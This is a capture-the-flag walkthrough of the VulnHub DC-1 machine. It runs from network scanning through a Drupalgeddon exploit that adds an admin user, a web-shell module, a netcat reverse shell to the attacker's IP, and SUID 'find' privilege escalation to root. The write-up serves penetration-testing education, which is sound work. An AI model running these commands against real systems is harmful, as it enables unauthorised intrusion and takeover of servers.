DC 1 from (DC series)

in VULNHUB

DC ** series was designed to be a challenge for beginners,but just how easy it is will depend on your skills and knowledge and your ability to learn. It is designed by **DCAU. There are multiple ways of gaining root,however,they have include some flags which contain clues for beginners.

Level : Beginners Hosted on Vulnhub , DC 1 Data release: 28 Feb 2019

Start

Box are not showing any ip address so let’s start with scanning the network to find out target.

  1. netdiscover. netdiscover Ours target is –> 192.168.0.119

    Our box is running on virtual box so it’s mac vendor is PCS Systemtechnik

Scanning

next step to scan the target and find out the operating system running service and open port on the server. For scanning we used nmap .

nmap -sV -sC -oA scan1 192.168.0.119

nmap Scan

it’s a ‘noisy’ nmap scan. -sV for open ports to determine service/version info. -sC equivalent to –script=default .it will run some default nmap script against the target host.

Nmap output shows us that there are 3 ports open. 22(SSH),80(HTTP),111(RPC).nmap also find the robots.txt and site is running Drupal CMS (Drupal 7 ).Open the IP address in the browser to see how the web page look like.

drupal webpage

Nmap find the robots.txt file in that file we see some on hidden directory.but i try to brute force the web directory with gobuster

gobuster dir -u http://192.168.0.119/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dirScan

dirscan

Drupal

After a bit poking around,I search in google for brupal scan and try to find out some tools and any interesting about drupal.I find a tool in online called “Droopescan” .

droopescan

Interesting! Most of it doesn’t mean much to me,I’m not a Drupal pro,but something in the back of my mind grabs my attention when I see the Drupal versions again. So search in searchsploit tools.This is offline database of exploit-db.com.

searchsploit Drupal 7

searchsploit

Drupalgeddon has SQL Injection that can (add Admin User) so i download the exploit with this command.

searchsploit -m exploits/php/webapps/34984.py

exploit

Running the exploit with python we can see it exploit need -t for target url ,-u useranem and -p password.I give the target url ,username and password. runiing exploit

Using that credentials to login as administrator.

username

Now we need a Shell for get inside of that server. So I search drupal shell in google and i found a module that give a web shell.

google search

Find out that module can be install from url. So i copy the module url.

google download

install module

To use that shell module.We need to active the module.

shell active

After Search the “Shell” url ,find in Navigation menu.After visiting it.Now we can run commands on the back-end server . So, I decided to get a reverse shell to my machine using “nc” utility.

web shell

For the native shell i use my favorite website “http://pentestmonkey.net”

nc -e /bin/sh 192.168.0.109 9001

webshell

Native shell shell pty

Post-exploitation

Now, I start checking for rooting the server. There are many techniques to do That.One of them is searching for the binaries owned by the root user and has “suid”, which is a feature is a feature is Linux that allows users to execute files with the permissions of a specific user. Find search for files that has we run a command.

find / -perm /4000 2>/dev/null

permission

Now we can get root user to exploit the find with this command

find . -exec '/bin/sh' \;

root

Hope that you learn something new by reading this post.

© 2019. All rights reserved.

Powered by NightHawk